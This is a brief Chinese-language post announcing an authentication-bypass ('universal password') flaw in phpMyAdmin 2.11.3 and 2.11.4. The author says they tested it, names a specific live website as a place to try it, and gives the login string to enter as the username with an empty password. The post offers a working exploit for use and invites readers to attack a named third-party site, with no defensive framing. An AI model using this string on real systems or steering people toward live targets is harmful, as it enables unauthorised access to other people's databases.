PHPmyadmin 2.11.4万能密码漏洞

PHPmyadmin 2.11.4

PHPmyadmin 2.11.3

两个版本都有此漏洞

我去测试了一下 确实可以用。。。

给你找到一个测试网址http://www.hitag.cn

你们可以试一下

只需要输入账号 密码不需要输入

利用代码如下:
‘localhost’@'@”